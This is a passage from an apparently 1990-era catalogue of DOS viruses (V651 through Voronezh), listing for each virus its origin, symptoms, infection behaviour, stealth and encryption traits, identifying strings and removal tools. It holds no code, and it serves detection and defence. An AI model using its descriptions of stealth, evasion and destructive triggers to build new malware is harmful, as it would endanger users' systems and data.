 Discovered:  April, 1990
 Symptoms:    .COM & .EXE growth, decrease in system and free memory,
              file allocation errors
 Origin:      Sofia, Bulgaria
 Eff Length:  651 Bytes
 Type Code:   PRtA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V66+, VirHunt 2.0+
 Removal Instructions: Scan/D, VirHunt 2.0+, or Delete infected files
 General Comments:
       The V651, or Eddie 3, Virus was isolated in Sofia, Bulgaria in
       April 1990 by Vesselin Bontchev.  V651 is believed to have been
       written by the same author as Dark Avenger, V1024, and V2000.
       This virus is a generic infector for .COM and .EXE files.

       The first time a program infected with V651 is executed, the virus
       will install itself memory resident.  Using the DOS CHKDSK program,
       total system memory, as well as available free memory, will be
       decreased by 688 bytes.

       Later, as programs with a length of 651 bytes or greater are executed,
       they will be infected by the virus.  Infected files increase in length
       by 651 bytes, though the increase in file length will not be seen by
       performing a directory command with the virus present in memory. The
       total available disk space will also be adjusted by the virus so that
       the decrease in available disk space due to the virus's activities
       cannot be seen.  Powering off the system and booting from a known
       clean boot diskette, followed by issuing a directory command will
       result in the correct infected file lengths being displayed as well
       as the actual available space on the disk.

       Infected files can be easily identified as the text string "Eddie
       Lives." appears near the end of the infected file.  These files will
       also be 651 bytes longer than expected when the virus is not
       present in memory.

       A side effect of the V651 virus is that lost clusters may occur on
       infected systems if the CHKDSK /F command is used.  While this does
       not occur for all infected files, the number of errors reported by
       CHKDSK will be much higher statistically when V651 is present.

       Unlike Dark Avenger and V2000, this virus does not infect
       files on any file open.  It only infects when programs are executed.

       Also see: Dark Avenger, V1024, V2000


 Virus Name:  V800
 Aliases:     Live after Death Virus, Stealth Virus
 V Status:    Rare
 Discovered:  May, 1990
 Symptoms:    .COM growth, decrease in total system and available memory
 Origin:      Bulgaria
 Eff Length:  800 Bytes
 Type Code:   PRC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan V63+, Pro-Scan 1.4+, F-Prot 1.12+
 Removal Instructions: CleanUp V64+, Scan/D, F-Prot 1.12+, or
              delete infected files
 General Comments:
       The V800, or Live after Death, Virus was isolated in Bulgaria by
       Vesselin Bontchev in May, 1990.  The V800 is a self-encrypting
       memory resident .COM infector, and it does not infect COMMAND.COM.
       This virus is thought to have been written by the same person as
       the Dark Avenger virus since many of the same techniques are
       used.

       The virus has received an alias of the Live after Death Virus as
       the virus contains the "Live after Death" string, though it
       cannot be seen in infected files as the virus is encrypted.

       The first time an infected program is run on a system, the V800
       Virus will install itself memory resident.  In the process of
       installing itself resident, it will decrease available system
       memory by 16K, using 8,192 Bytes for itself in the top of
       available free memory.  It will also hook interrupt 2A.

       Once in memory, every time a .COM file is attempted to be
       executed, the virus will check to see if it is a candidate for
       infection.  Whether the file will be infected depends on the
       size of the .COM file when it is attempted to be executed.  In
       no event is a .COM file smaller than 1024 bytes infected, but
       not all .COM files over 1024 bytes are infected either.

       The V800 Virus will reinfect .COM files, with the file's size
       increasing by 800 bytes with each infection.  It does not,
       however, infect .COM files more than eight times.

       Known variant(s) of the V800 Virus include:
       V800M   : Very similar to V800, the major difference is that V800M
                 will infect files on both file open and file execute,
                 putting this variant into the "Stealth" virus category.
                 When the virus becomes memory resident, total system and free
                 memory will decrease by only 8,192 bytes.  This variant
                 does not have the "Live after Death" string in it.


 Virus Name:  V1024
 Aliases:     Dark Avenger III, Stealth Virus
 V Status:    Rare
 Discovered:  May, 1990
 Symptoms:    TSR; decrease in available free memory
 Origin:      Bulgaria
 Eff Length:  1,024 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V64+
 Removal Instructions: Scan/D, or Delete infected files
 General Comments:
       The V1024, or Dark Avenger III, Virus was discovered in Bulgaria in
       April 1990 by Daniel Kalchev.  V1024 is a memory resident generic
       infector of .COM and .EXE files.  It is believed to have been written
       by the same person that wrote Dark Avenger and V2000.  This virus may
       actually be an earlier version of the Dark Avenger virus, it has many
       of the same characteristics, though it does not infect all files when
       they are opened for any reason.

       The first time a program infected with V1024 is executed, the virus
       will install itself memory resident.  At this time, it checks to see
       if several interrupts are being monitored, including interrupts 1
       and 3.  If interrupts 1 and 3 are monitored, V1024 allow the current
       program to run, but any subsequent program executed will hang the
       system and V1024 will not replicate.  When V1024 is memory resident,
       infected systems will experience a decrease in free memory by 1,072
       bytes.  Total system memory will not have changed.  The virus will
       have remapped several interrupts by altering their location in the
       interrupt map page in memory.  These interrupts will now be controlled
       by V1024.

       After V1024 becomes memory resident, the virus will infect any
       program executed which is greater in length than 1,024 bytes.  Both
       .COM and .EXE files are infected, COMMAND.COM is not infected.
       Infected files increase in length by 1,024 bytes, though this increase
       will not appear if the virus is present in memory and a DIR listing
       is done.

       V1024 infected files can be identified by a text string which
       appears very close to the end of infected files.  The text string is:
       '7106286813'.

       V1024 does not appear contain any activation date.

       Also see: Dark Avenger, V2000, V651


 Virus Name:  V2000
 Aliases:     Dark Avenger II, Stealth Virus, Travel Virus
 V Status:    Rare
 Discovered:  1989
 Symptoms:    TSR; .COM, .EXE, .OV? growth (see text); crashes;
              crosslinked files following CHKDSK.
 Origin:      Bulgaria
 Eff Length:  2,000 Bytes
 Type Code:   PRA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V59+, Pro-Scan 1.4+, AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: Scan/D, Pro-Scan 1.4+, or delete infected files
 General Comments:
       The V2000, or Dark Avenger II, virus is a memory resident generic
       file infector.  The first isolated samples of this virus were
       received from Bulgaria, where it was isolated by Daniel Kalchev
       and Niki Spahiev.

       V2000 will infect .COM, .EXE, and Overlay files, as well as
       COMMAND.COM.  When the first infected file is executed, the virus
       installs itself memory resident, and then infected COMMAND.COM if
       it has not already been infected.  Then, when an executable file
       is opened for any reason, it is infected if it hasn't been
       previously infected.

       Increased file lengths will not be shown if the V2000 virus is
       present in memory when a DIR command is issued.  Issuing a
       CHKDSK /F command on infected systems may result in crosslinking
       of files since the directory information may not appear to match
       the entries in the file allocation table (FAT).

       Systems infected with the V2000 virus will experience unexpected
       system crashes, resulting in lost data.  Some systems may also
       become unbootable due to the modification of COMMAND.COM or the
       hidden system files.

       One of the following two text strings will appear in the viral code
       in infected files, thus accounting for the alias of Travel Virus used in
       Bulgaria:

              "Zopy me - I want to travel"
              "Copy me - I want to travel"

       There are reports from Bulgaria that the V2000 virus looks for and
       hangs the system if programs written by Vesselin Bontchev are
       attempted to be executed.  This would explain the presence of the
       following copyright notice within the viral code:

              "(c) 1989 by Vesselin Bontchev"

       Known variants of the V2000 virus include:
       V2000-B/Die Young : Similar to the V2000 virus, the main difference is
              that the text string "Zopy me - I want to travel" is now
              "Only the Good die young..." or "Mnly the Good die young..."
              and the encryption used by the virus is different.  This
              variant is actually the original virus, predating V2000.

       Also see: Dark Avenger, V1024, V651


 Virus Name:  V2100
 Aliases:     2100, Stealth Virus, UScan Virus
 V Status:    Rare
 Discovered:  July, 1990
 Symptoms:    file allocation errors, decrease in system and free memory
 Origin:      Bulgaria
 Eff Length:  2,100 Bytes
 Type Code:   PRtA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V66+
 Removal Instructions: Scan/D, or delete infected files
 General Comments:
       The V2100, or 2100, Virus was first isolated in Sofia, Bulgaria by
       Vesselin Bontchev in July 1990.  It is a resident generic infector
       of .COM, .EXE, and overlay files.  It will also infect COMMAND.COM.
       This virus appears to have been originally released into the public
       domain on an anti-viral program named UScan which was uploaded to
       a BBS in Europe.  While not all copies of UScan are carriers
       of this virus, there was one version which exists that has the virus
       embedded in its program code.  The virus cannot be detected on this
       trojan version using search algorithms for this virus.  V2100 is
       believed to have been written by the author of Dark Avenger.

       The first time a program infected with V2100 is executed, the virus
       will install itself memory resident above top of memory but below
       the 640K boundary.  The top of memory returned by interrupt 12 will
       be lower than expected by 4,288 bytes.  Likewise, free memory will
       have decreased by 4,288 bytes.  At this same point, V2100 will infect
       COMMAND.COM though the change in file length will be hidden by the
       virus.

       Once the virus is memory resident, it will infect any .COM, .EXE, or
       overlay file with a file length of at least 2100 bytes that is
       executed or opened for any reason.  The simple act of copying an
       executable file will result in both the source and target files
       becoming infected.  Infected files will be 2,100 bytes longer,
       though the virus will hide the change in file length so that
       it isn't noticeable when directories are listed.  In some cases,
       infected files will appear to be 2,100 bytes smaller than expected
       if the virus is present in memory.

       Systems infected with the V2100 virus will notice file allocation
       errors occurring, along with crosslinking of files.  Due to these
       errors, some files may become corrupted.  These file allocation
       errors are truly errors, they exist whether or not the virus is
       present in memory.

       A side note on the V2100 Virus: if the system had previously been
       infected with the Anthrax virus, V2100's introduction will result
       in the Anthrax virus again being present in the hard disk partition
       table.  This effect occurs because Anthrax stores a copy of itself
       on the last sectors of the hard disk.  When V2100 becomes resident,
       it searches the last 16 cylinders of the hard disk for a copy of
       Anthrax.  If V2100 finds the hidden copy of Anthrax, it copies it
       into the hard disk's partition table.  On the next system boot from
       the hard disk, Anthrax will once again be active on the system.


 Virus Name:  V2P2
 Aliases:
 V Status:    Research
 Discovered:  June, 1990
 Symptoms:    .COM file growth
 Origin:      Minnesota, USA
 Eff Length:  1,426 - 2,157 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D/X, or delete infected files
 General Comments:
       The V2P2 Virus is a research virus written by Mark Washburn and
       distributed to some anti-viral program authors in June of 1990.
       This virus, according to its author, has not been released.  This
       virus is a non-resident generic infector of .COM files.

       When a program infected with the V2P2 virus is executed, it will
       infect the first .COM file it finds in the current directory which
       is not infected with the virus.  The virus adds its code to the
       end of the file, and the infected file's length will increase
       between 1,426 and 2,157 bytes.

       Like the 1260 virus, this virus uses a complex encryption method.
       In fact, the encryption used with the 1260 virus is one of several
       possible encryptions that V2P2 may produce.  As a result, virus
       scanning software will often identify the 1260 virus in a file as
       being both 1260 and V2P2.  This identification is entirely valid
       as 1260 is a special case of V2P2.

       Also see: 1260, V2P6, V2P6Z


 Virus Name:  V2P6
 Aliases:
 V Status:    Research
 Discovered:  July, 1990
 Symptoms:    .COM file growth
 Origin:      Minnesota, USA
 Eff Length:  1,946 - 2,111 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan/X V67+, Pro-Scan 2.01+
 Removal Instructions: Scan/D/X, or delete infected files
 General Comments:
       The V2P6 Virus is a research virus written by Mark Washburn and
       distributed to some anti-viral program authors in July of 1990.
       This virus, according to its author, has not been released.  This
       virus is a non-resident generic infector of .COM files similar to
       the 1260, V2P2, and V2P6Z viruses.

       When a program infected with the V2P6 virus is executed, it will
       infect the first .COM file it finds in the current directory which
       is not infected with the virus.  The virus adds its code to the
       end of the file, and the infected file's length will increase
       between 1,946 and 2,111 bytes.

       Like the 1260 and other viruses by Mark Washburn, this virus uses
       a complex encryption method.  The encryption method used by V2P6 is
       more complex than that used in V2P2, but less complex than that used
       in the last known virus in this family, V2P6Z.  Like V2P2, an
       algorithmic approach must be used to identify this virus.

       Also see: 1260, V2P2, V2P6Z


 Virus Name:  V2P6Z
 Aliases:
 V Status:    Research
 Discovered:  August, 1990
 Symptoms:    .COM file growth
 Origin:      Minnesota, USA
 Eff Length:  2,076 - 2,364 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:
 Removal Instructions: Delete infected files
 General Comments:
       The V2P6Z Virus is a research virus written by Mark Washburn and
       distributed to some anti-viral program authors in August, 1990.
       This virus, according to its author, has not been released.  This
       virus is a non-resident generic infector of .COM files similar to
       the 1260, V2P2, and V2P6 viruses.

       When a program infected with the V2P6Z virus is executed, it will
       infect the first .COM file it finds in the current directory which
       is not infected with the virus.  The virus adds its code to the
       end of the file, and the infected file's length will increase
       between 2,076 and 2,364 bytes.

       Like the 1260 and other viruses by Mark Washburn, this virus uses
       a complex encryption method.  The encryption method used by V2P6Z is
       the most complex of the encryption methods employed by the viruses in
       this family of viruses.  Like V2P2 and V2P6, an algorithmic approach
       must be used to identify this virus as there is no possible
       identification string within the encrypted viral code.

       Also see: 1260, V2P2, V2P6


 Virus Name:  Vacsina
 Aliases:
 V Status:    Endangered
 Discovered:  November, 1989 
 Symptoms:    TSR; .COM, .EXE, .BIN, & .SYS growth; "beeps"
 Origin:      Bulgaria
 Eff Length:  1,206 bytes
 Type Code:   PRsA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan, F-Prot, Pro-Scan 1.4+, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions: CleanUp V64+, Scan/D/A, F-Prot, VirHunt 2.0+,
              or delete infected files
 General Comments:
       The Vacsina virus is approximately 1200 bytes in length and can
       be found in memory on infected systems.  There are at least 48
       variants of the Vacsina virus, also known as the TP virus
       family, though not all of them have been isolated.  Later versions
       of this virus are included in this listing under the name
       "Yankee Doodle".

       Generally, the Vacsina Virus infects both .COM and .EXE files,
       as well as .SYS and .BIN files.  This virus, when infecting a .EXE
       file, will first convert it into .COM format by changing the MZ
       or ZM identifier in the first two bytes of the file to a JMP
       instruction and then adding a small piece of relocator code, so
       that the .EXE file can be infected as though it were originally a
       .COM file.

       One sign of a Vacsina infection is that programs which have been
       infected may "beep" when executed.  Infected programs will also
       have their date/time in the disk directory changed to the date and
       time they were infected.

       Known Vacsina Variants Include:
       TP04VIR - Infects .EXE files, changing them internally into .COM
                 files.  Infected programs may beep when executed, and
                 may be identified by searching for the text string
                 "VACSINA" along with the second byte from the end of
                 the file containing a 04h.  This version of Vacsina is
                 a poor replicator, and while it will always convert a
                 .EXE file to .COM file format, adding 132 bytes, it does
                 not always infect executed files.
       TP05VIR - Similar to TP04VIR, except that the second to the last
                 byte in the file is now a 05h.  System hangs may also
                 be experienced.
       TP06VIR - Similar to TP05VIR, except the second to the last byte in
                 the file is now a 06h.
       TP16VIR - Similar to TP06VIR, the second to the last byte in the
                 infected file is now 10h.
       TP23VIR - Similar to TP16VIR, the second to the last byte in the
                 infected file is now 17h.  The text "VACSINA" no longer
                 appears in the virus.
       TP24VIR - Similar to TP23VIR, the second to the last byte in the
                 infected file is now 18h.
       TP25VIR - Similar to TP24VIR, the second to the last byte in the
                 infected file is now 19h.

       Also see: Yankee Doodle


 Virus Name:  VComm
 Aliases:     637
 V Status:    Rare
 Discovered:  December, 1989
 Symptoms:    .EXE growth, TSR, write failures
 Origin:      Poland
 Eff Length:  637 Bytes
 Type Code:   PRaE - Parasitic Resident .EXE Infector
 Detection Method: F-Prot, ViruScan V60+, IBM Scan, Pro-Scan, VirexPC,
              AVTK 3.5+, VirHunt 2.0+
 Removal Instructions: F-Prot, Scan/D, VirexPC, or delete infected files
 General Comments:
       The Vcomm virus is of Polish origin, first isolated in
       December, 1989.  The virus is a .EXE file infector.  When an
       infected file is run, the virus will attempt to infect one
       .EXE file in the current directory.  It will also infect the
       memory resident version of the system's command interpreter.

       When Vcomm infects a file, it first pads the file so that the
       files length is a multiple of 512 bytes, then it adds its
       637 bytes of virus code to the end of the file.

       The memory resident portion of the virus intercepts any
       disk writes that are attempted, and changes them into disk
       reads.


 Virus Name:  VFSI
 Aliases:     437, Happy Day
 V Status:    Rare
 Discovered:  September, 1990
 Symptoms:    .COM growth; message
 Origin:      Bulgaria
 Eff Length:  437 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V71+, Pro-Scan 2.01+
 Removal Instructions: Scan/D, Pro-Scan 2.01+, or Delete infected files
 General Comments:
       The VFSI Virus was isolated in September, 1990 at VFSI (the Higher
       Institute of Financial Management) located in Svistov, a town on the
       Danube.  VFSI is a non-resident, direct action, infector of .COM files,
       including COMMAND.COM.

       When a program infected with the VFSI virus is executed, it will infect
       one other .COM file located in the current directory.  Candidate files
       to be infected are first aligned to be a multiple of 16, and then the
       viral code is added.  Infected files will increase in length by between
       437 and 452 bytes, with the viral code being located at the end of
       infected files.

       Infected files can be easily identified as they will always contain the
       following hex string: 3A483F244B6F636E706C74.

       On approximately one out of five executions of an infected program, the
       program will flash the following message on the screen:

               "HELLO!!! HAPPY DAY and SUCCESS
                  from virus 1.1 VFSI-Svistov"

       This message is encrypted in the viral code, so it is not visible in
       infected files.


 Virus Name:  VHP
 Aliases:     VHP-348, VHP-353, VHP-367, VHP-435
 V Status:    Research
 Discovered:  July 1989
 Symptoms:    .COM growth, system hangs
 Origin:      Bulgaria
 Eff Length:  348 - 435 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V64+, AVTK 3.5+, F-Prot 1.12+, Pro-Scan 2.01+
 Removal Instructions:  Scan/D, F-Prot 1.12+, or Delete infected files
 General Comments:
       The VHP Virus is actually a small group or "family" of viruses that
       was discovered in Bulgaria in early 1990.  There are currently four
       identified variants to the VHP Virus, with the VHP-435 variant being
       the one with the most potential for spreading.  These viruses were
       originally based on the Vienna virus.  The progression of the
       variants shows each variant to be a slightly better replicator.

       The VHP Viruses are:
       VHP-348  : This variant does not replicate due to bugs in the
                  virus code.  If it did replicate, it would infect
                  .COM files.  The virus's effective length is 348 bytes.
       VHP-353  : VHP-348 fixed so that it will infected COMMAND.COM,
                  increasing its size by 353 bytes.  It does not infect
                  other .COM files.  This variant is still buggy, and it
                  will occasionally hang systems when attempting to find
                  a .COM file to infect.
       VHP-367  : VHP-353 which will now infect .COM files besides
                  COMMAND.COM.  Infected files increase in size by 367
                  bytes.  Very rarely, this virus will reinfect an infected
                  .COM file.  VHP-353 does not always infect a .COM file
                  when an infected program is executed, it will sometimes
                  not infect any .COM file, though it has in effect
                  immunized the file from infection.  This effect is
                  probably a bug in this variant.
       VHP-435  : Isolated in July, 1989, this variant is 435 bytes in
                  length and is not destructive, all it does is spread.
                  VHP-435 will attempt to infect 1 file each time an
                  infected program is executed. COMMAND.COM and .EXE
                  files are not infected.  After infecting all of the
                  .COM files on the current drive and directory, it will
                  attempt to infect drive C:.   VHP-435 is the VHP-367
                  virus with some modifications to make it less likely to
                  be noticed.

       Also see: Vienna, VHP2


 Virus Name:  VHP2
 Aliases:     623, VHP-623
 V Status:    Research
 Discovered:  March, 1990
 Symptoms:    .COM growth, reboots or system hangs
 Origin:      Bulgaria
 Eff Length:  623 bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V64+, Pro-Scan 1.4+, AVTK 3.5+, F-Prot 1.12+,
              VirHunt 2.0+
 Removal Instructions:  Scan/D, Pro-Scan 1.4+, F-Prot 1.12+, or
              Delete infected files
 General Comments:
       The VHP2 Virus was isolated in Bulgaria in March, 1990.  This virus
       is based on the Vienna Virus, and has many of the same characteristics
       of the VHP-435 variant of the VHP virus.  It's major difference is that
       of effective length, and that 1 of every 8 infected programs will
       perform a system warm reboot.

       VHP2 is 623 bytes long, infecting only .COM files but not COMMAND.COM.

       Known variants of the Vienna Virus include:
       VHP-627  : Similar to VHP-623, except that its length is 627 bytes.

       Also see: VHP, Vienna


 Virus Name:  Victor
 Aliases:
 V Status:    Rare
 Discovered:  May, 1990
 Symptoms:    .COM &.EXE growth, data file corruption, file linkage errors,
              and unexpected system reboots
 Origin:      USSR
 Eff Length:  2,458 bytes
 Type Code:   PRAK - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V63+, Pro-Scan 1.4+, VirexPC, F-Prot 1.12+
 Removal Instructions:  Scan/D, Pro-Scan 1.4+, F-Prot 1.12+, or
              Delete infected files
 General Comments:
       The Victor Virus was first isolated in May, 1990.  It is believed
       to have originated in the USSR due to messages which appear within
       the viral code:

          "Victor V1.0 The Incredible High Performance Virus
           Enhanced versions available soon.
           This program was imported from USSR.
           Thanks to Ivan."

       The above message can be found at the end of infected files, but
       does not appear to ever be displayed.

       The first time a program infected with the Victor Virus is executed,
       the virus will install itself memory resident, occupying 3,072 bytes
       at the top of free memory.  Interrupt 21 will be intercepted by
       the virus.  After becoming memory resident, Victor will then
       seek out and infect COMMAND.COM.

       Victor is a very slow file infector, only infected approximately
       1 in every 10 programs executed after it becomes memory resident.
       Infected programs will increase in length by between 2,443 and
       2,458 bytes.  The increase in file size is not hidden by the
       virus.

       Occasionally in the process of infecting a file, the virus will
       hang the system, which may result in data file corruption.
       Overlay files may also be infected, resulting in file linkage
       errors.
 

 Virus Name:  Vienna
 Aliases:     Austrian, Unesco, DOS-62, DOS-68, 1-in-8, 648
 V Status:    Endangered
 Discovered:  April, 1988
 Symptoms:    .COM growth, reboots or system hangs
 Origin:      Austria
 Eff Length:  648 bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan, F-Prot, IBM Scan, Pro-Scan, VirexPC, AVTK 3.5+,
              VirHunt 2.0+
 Removal Instructions:  CleanUp V66+, VirClean, F-Prot, VirHunt 2.0+,
              Pro-Scan 1.4+, or VirexPC
 General Comments:
       The Vienna virus was first isolated in April, 1988, in Moscow at
       a UNESCO children's computer summer camp.  The virus will infect
       1 .COM file whenever a program infected with the virus is run.
       1 in every 8 infected programs will perform a system warm reboot
       whenever the viral code is executed.  Some .COM programs
       infected with this virus may not run.

       The Vienna virus was written by a high school student in Vienna
       Austria as an experiment.  Its large number of variants can be
       accounted for as its source code has been published many times.

       Known variants of the Vienna Virus include:
       Vienna-B : Similar to Vienna, except that instead of a warm reboot,
                  the program being executed will be deleted.
       Vienna-B 645 : Similar to the Vienna-B variant, this variant's
                  effective length is 645 bytes.  It does not perform either
                  a warm reboot or delete executed programs.  It does,
                  however, infect COMMAND.COM
                  Origin: United States
       Vien6    : Similar to Vienna, except that the warm reboot has been
                  removed.  Effective length of the virus is still 648 bytes.
                  After 7 files have become infected on the current drive,
                  the virus will then start infecting .COM files on drive C:.

       Also see: 1260, Ghostballs, Lisbon, W13, VHP, VHP-2


 Virus Name:  Violator
 Aliases:     Violator Strain B
 V Status:    Endangered
 Discovered:  August, 1990
 Symptoms:    .COM growth, Sector not found error on drive B:
 Origin:      USA
 Eff Length:  1,055 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V67+, Pro-Scan 2.01+
 Removal Instructions:  Clean-Up V71+, Scan/D, or Delete infected files
 General Comments:
       The Violator Virus was submitted in August, 1990 by an anonymous
       user of Homebase BBS.  This virus is a non-resident parasitic
       virus which infects .COM files, including COMMAND.COM.

       When a program infected with the Violator Virus is executed, what
       happens depends on what the system date is set to.  If the date is
       prior to August 15, 1990, the virus will infect 1 .COM file located
       in the current directory, adding 1,055 bytes to the program.  If the
       date is August 15, 1990 or after, the virus will not infect any files.

       Symptoms of an infection of the Violator Virus include unexpected
       attempts to access drive B:.  If there is no diskette in drive B:,
       or the diskette in drive B: is write-protected, a Sector not found
       error will result.  

       The following message appears in the viral code located in infected
       programs:

           "TransMogrified (TM) 1990 by
            RABID N'tnl Development Corp
            Copyright (c) 1990 RABID!
            Activation Date: 08/15/90
            - Violator Strain B -
            ! (Field Demo Test Version) !
            ! * NOT TO BE DISTRIBUTED * !"


 Virus Name:  Violator B4
 Aliases:     Christmas Violator, Violator Strain B4
 V Status:    New
 Discovered:  December, 1990
 Symptoms:    .COM growth on 8088 based system;
              Hard Disk Corruption on 80286 & 80386 based systems
 Origin:      United States
 Eff Length:  5,302 Bytes
 Type Code:   PNCK - Parasitic Non-Resident .COM Infector
 Detection Method:  ViruScan V74+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Violator B4 Virus was isolated in December, 1990 in the United
       States.  This virus was originally released into the public domain
       on a trojan version of DSZ (DSZ1203).  It is a non-resident infector
       of .COM files, including COMMAND.COM.

       What Violator B4 does depends on what processor is in the personal
       computer it is being executed on.  On 80286 and above processors, the
       virus will activate immediately, overwriting the beginning portion of
       the system hard disk.  It will also attempt to display a Christmas
       greeting at that time, but the greeting display will be garbled if
       Ansi.Sys is not loaded.  Damage caused by Violator B4 at activation
       can be repaired using Norton Disk Doctor.

       On an 8088 based system, Violator B4 will do nothing but replicate.
       Each time an infected program is executed, the virus will infect one
       other .COM program in the current directory.  Violator B4 infected
       files will have a file length increase of 5,302 bytes.  The file's
       date and time in the disk directory will not be altered.  The virus
       will be located at the end of the infected file.

       The following text message is contained within the Violator B4 virus,
       though it is never displayed:

          "Violator Strain B4 - Written by RABID Nat'nl Development Corp.
           RABID would like to take this opportunity to extend it's sincerest
           holiday wishes to all Pir8 lamers around the world! If you are
           reading this, then you are lame!!!
           Anyway, to John McAffe! Have a Merry Christmas and a virus filled
           new year. Go ahead! Make our day!
           Remember! In the festive season, Say No to drugs!!! They suck shit!
           (Bah! We make a virus this large, might as well have
           something positive!)"


 Virus Name:  VirDem
 Aliases:     VirDem 2
 V Status:    Endangered
 Discovered:  1986-1987
 Symptoms:    .COM growth, Messages
 Origin:      Germany
 Eff Length:  1,236 Bytes
 Type Code:   PNC - Parasitic Non-Resident .COM Infector
 Detection Method:  VirexPC, AVTK 3.5+, F-Prot 1.12+, ViruScan V71+,
              VirHunt 2.0+, Pro-Scan 2.01+
 Removal Instructions:  F-Prot 1.12+, Scan/D, or Delete infected files
 General Comments:
       The VirDem Virus was written in 1986-1987 by Ralf Burger of Germany.
       The virus was originally distributed in Europe as a demonstration
       virus, to assist computer users in understanding how a computer
       virus operates.

       The VirDem virus is not memory resident, and only infects .COM files
       on the A: drive.  It will always skip the first .COM file in the
       root directory, so normally it will not infect COMMAND.COM.  It will
       also not infect .COM files past the second subdirectory on the disk.

       Infected files that were originally less than approximately 1,500
       bytes will be 2,616 bytes after infection.  .COM files which were
       greater than 1,500 bytes will increase in size by approximately
       1,236 bytes.

       When an infected program is executed, VirDem will infect the next
       candidate .COM file.  Infected files will contain the viral code,
       followed by the original program.  After infecting the .COM file,
       the virus will play a "game" with you, starting with the following
       text being displayed:

              " VirDem Ver.: 1.06 (Generation #) aktive.
                Copyright by R.Burger 1986,1987
                Phone.: D - xxxxx/xxxx

                This is a demoprogram for
                computerviruses. Please put in a
                number now.
                If you're right, you'll be
                able to continue.
                The number is between
                0 and #                                         "

               (Note: I have removed the phone number here, but it
                appears where xxxxx/xxxx is above.  Where # is, the
                virus's generation number appears.)

       At this point, you must guess the correct number and enter it.  If
       you put in the wrong number, you get the following message and
       your program is not run:

              " Sorry, you're wrong

                More luck at next try ....    "

       If you guess the correct number, you receive the following message
       and your program then executes:

              " Famous. You're right.
                You'll be able to continue.  "

       Finally, after all the candidate .COM files on the A: drive are
       infected, the following message is displayed:

              " All your programs are
                struck by VIRDEM.COM now."

       VIRDEM.COM was the original distribution file containing the virus,
       and had a VIRDEM.DOC file included with it.  VirDem is not widespread,
       and is not destructive.

       Known variant(s) of VirDem include:
       VirDem 2 : Similar to the virus described above, the major difference
                  is that the text messages have been translated to German.

       Also see: Burger


 Virus Name:  Virus-90
 Aliases:
 V Status:    Research
 Discovered:  December, 1989
 Symptoms:    .COM growth, TSR
 Origin:      District of Columbia, USA      
 Eff Length:  857 bytes
 Type Code:   PRC - Parasitic Resident .COM Infector
 Detection Method:  ViruScan/X V67+, F-Prot, IBM Scan, Pro-Scan 1.4+, VirexPC,
              AVTK 3.5+
 Removal Instructions:  Scan/D/X, F-Prot, Pro-Scan 1.4+,
              or delete infected files
 General Comments:
       The Virus-90 virus was originally distributed in December, 1989
       by Patrick Toulme as an "educational tool", with the virus
       source also available for sale.  In January, 1990, the
       author contacted the sites where he had uploaded the virus
       requesting that they remove it from their systems, his having
       decided a live virus was not a "good idea" for an educational
       tool after being contacted by several viral authorities.

       The following description was submitted by Patrick Toulme in
       November 1990 for inclusion in this listing:

       "This educational, research virus was written by Patrick Toulme
       to aid developers in understanding direct-virus action and in
       creating virus-resistant software.  This virus is a simple COM
       infector that will not infect a hard drive and advises the user
       when a file on a floppy disk is to be infected.  Of course, no
       damage occurs from the virus and all infected files advise the
       user of the infection upon execution.  The safeguards provided by
       the author prevent accidental infection and the dis-assembly of the
       code is extremely difficult.  Upon request from the anti-viral
       community, Virus-90 is now only available to approved anti-virus
       researchers."

       Also see: Virus101


 Virus Name:  Virus101
 Aliases:
 V Status:    Research
 Discovered:  January, 1990
 Symptoms:    TSR, BSC, .COM growth (floppy only)
 Origin:      District of Columbia, USA
 Eff Length:  2,560 Bytes
 Type Code:   PRAFK - Parasitic Resident Infector
 Detection Method: ViruScan/X V67+, Pro-Scan 1.4+, F-Prot 1.12+, VirHunt 2.0+
 Removal Instructions:  Scan/D/X or delete infected files
 General Comments:
       The Virus101 is the "big brother" of Virus-90, also written by
       Patrick Toulme as an "educational tool" in January 1990.
       This virus is memory resident, and employs an encryption scheme
       to avoid detection on files.  It infects COMMAND.COM, and all
       other executable file types.  Once it has infected all the
       files on a diskette, it will infect the diskette's boot
       sector.  It only infects floppy diskettes in its current
       version.

       The following description was submitted by Patrick Toulme for
       inclusion in this listing in November 1990:

       "Virus-101 is a sophisticated, continually encrypting, research
       virus written by Patrick Toulme, author of Virus-90.  Virus-101
       infects both COM and EXE files and will evade most anti-virus
       software and will continually encrypt itself to prevent
       non-algorithmic search scans.  This virus is not available to the
       general public and is presently used by government agencies and
       corporate security departments to test anti-virus software and
       hardware devices."

       Also see: Virus-90

 
 Virus Name:  Voronezh
 Aliases:
 V Status:    Rare
 Discovered:  December 1990
 Symptoms:    .COM & .EXE growth; decrease in total system and available memory
 Origin:      USSR
 Eff Length:  1,600 Bytes
 Type Code:   PRhA - Parasitic Resident .COM & .EXE Infector
 Detection Method:  ViruScan V74+
 Removal Instructions:  Scan/D, or Delete infected files
 General Comments:
       The Voronezh Virus was received in December, 1990.  It is originally
       from the USSR.  Voronezh is a memory resident infector of .COM and
       .EXE files, and does not infect COMMAND.COM.

       The first time a program infected with Voronezh is executed the virus
       will install itself memory resident.  This virus will be resident at
       the top of system memory but below the 640K DOS boundary.  While the
